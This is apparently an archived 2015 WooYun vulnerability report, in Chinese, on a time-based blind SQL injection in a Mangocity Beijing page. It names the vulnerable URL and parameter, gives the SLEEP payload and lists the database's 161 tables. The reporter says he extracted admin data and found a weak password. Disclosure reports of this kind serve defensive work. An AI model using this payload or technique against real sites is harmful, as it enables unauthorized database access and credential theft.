当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135214

漏洞标题:芒果网某站存在SQL注入漏洞(可获取管理员信息)

相关厂商:芒果网

漏洞作者: 路人甲

提交时间:2015-08-19 10:01

修复时间:2015-08-24 10:02

公开时间:2015-08-24 10:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-19: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

test

详细说明:

芒果网北京分站存在sql注入漏洞,可获取到管理员信息。

漏洞证明:

链接:http://bj.mangocity.com/visa/tour_show.jsp?jspmaker_act_id=1027303

Parameter: jspmaker_act_id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: jspmaker_act_id=1027303 AND (SELECT * FROM (SELECT(SLEEP(5)))inWm)


通过注入可获取到dbs信息

2.jpg


当前库是ut7

4.jpg


该库中有161个表

1.jpg


[161 tables]
+---------------------------+
| account_info              |
| call_post_set             |
| comments                  |
| comments_reply            |
| crm_info                  |
| dev_data_fields           |
| dev_data_table            |
| dev_input_field           |
| dev_page_input            |
| dev_template              |
| fm_parameter              |
| fm_parameter_set          |
| fm_receivables_payables   |
| g_accessory               |
| g_fm_accounting           |
| g_fm_advertisement        |
| g_fm_inspect              |
| g_fm_person_brokerage     |
| g_sign_state              |
| gather_document           |
| gl_season_destination     |
| gl_strategy               |
| gl_strategy_page_block    |
| hc_train_info             |
| high_custom               |
| hk_airlines_info          |
| hk_flight_info            |
| hk_models                 |
| hotel_basic_info          |
| hotel_photo               |
| hotel_price_info          |
| hotel_room_info           |
| income_expenses_single    |
| insurance_company         |
| insurance_info            |
| jd_facility               |
| jd_group_info             |
| jd_hotel_info             |
| jd_photo                  |
| jd_room_info              |
| l_photo                   |
| member_log                |
| mobile_web_page_block     |
| monthly_balance           |
| oa_appliance              |
| oa_leave                  |
| oa_notice                 |
| oa_purchase               |
| oa_purchase_log           |
| oa_report_annul           |
| oa_report_annul_log       |
| oa_supplier               |
| oa_userget                |
| old_order                 |
| online_ask                |
| optional_order            |
| order_basic_info          |
| order_checkseat           |
| order_doc                 |
| order_file                |
| order_finance_statistics  |
| order_gathering           |
| order_insurance           |
| order_invoice             |
| order_other_cost          |
| order_outteam             |
| order_pay                 |
| order_pay_log             |
| order_pledge              |
| order_reality_data        |
| order_refund              |
| order_remark              |
| order_supplier            |
| order_visit               |
| order_visit_log           |
| os_accessory_file         |
| os_city                   |
| os_company                |
| os_country                |
| os_data_source            |
| os_fileup                 |
| os_function               |
| os_g_destination          |
| os_g_trip_type            |
| os_help                   |
| os_log                    |
| os_login_user             |
| os_module                 |
| os_order                  |
| os_photo                  |
| os_province               |
| os_suggest                |
| os_system                 |
| pay_order                 |
| personal_quick            |
| phone_to_callcenter       |
| qc_car_info               |
| qc_group_info             |
| reg_member                |
| reg_tables                |
| remit_info                |
| reply_question            |
| scenic_info               |
| scenic_photo              |
| self_expense              |
| set_of_book               |
| sign_contract             |
| sms_date                  |
| sms_log                   |
| sms_port                  |
| sort_table                |
| strategy_article          |
| strategy_aspect_info      |
| strategy_destination_info |
| strategy_photo            |
| strategy_web_column       |
| system_seting             |
| system_variable           |
| t_ad                      |
| t_admin                   |
| t_article                 |
| t_base_trans              |
| t_category                |
| t_commen                  |
| t_gather                  |
| t_gatherhis               |
| t_keywords                |
| t_label                   |
| t_role                    |
| t_source                  |
| t_special                 |
| t_template                |
| t_vote                    |
| t_voteitem                |
| t_web_seting              |
| tour_aspect               |
| tour_basic_info           |
| tour_basic_info_order     |
| tour_destination          |
| tour_price_info           |
| tour_price_info_order     |
| tour_schedule_info        |
| tour_shoping              |
| tour_stard_info           |
| tour_time                 |
| trip_type                 |
| user_department           |
| user_msg                  |
| visa_basic_info           |
| visa_reservation          |
| visa_test                 |
| visitor_list              |
| web_article               |
| web_column                |
| web_custom                |
| web_email_subscriptions   |
| web_error_page            |
| web_friendly_link         |
| web_page_block            |
| web_set_tour_aspect       |
| web_set_tour_destination  |
+---------------------------+


跑了一下t_admin的数据做验证,管理员密码还是弱口令。。。

3.jpg

修复方案:

做好过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-24 10:02

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论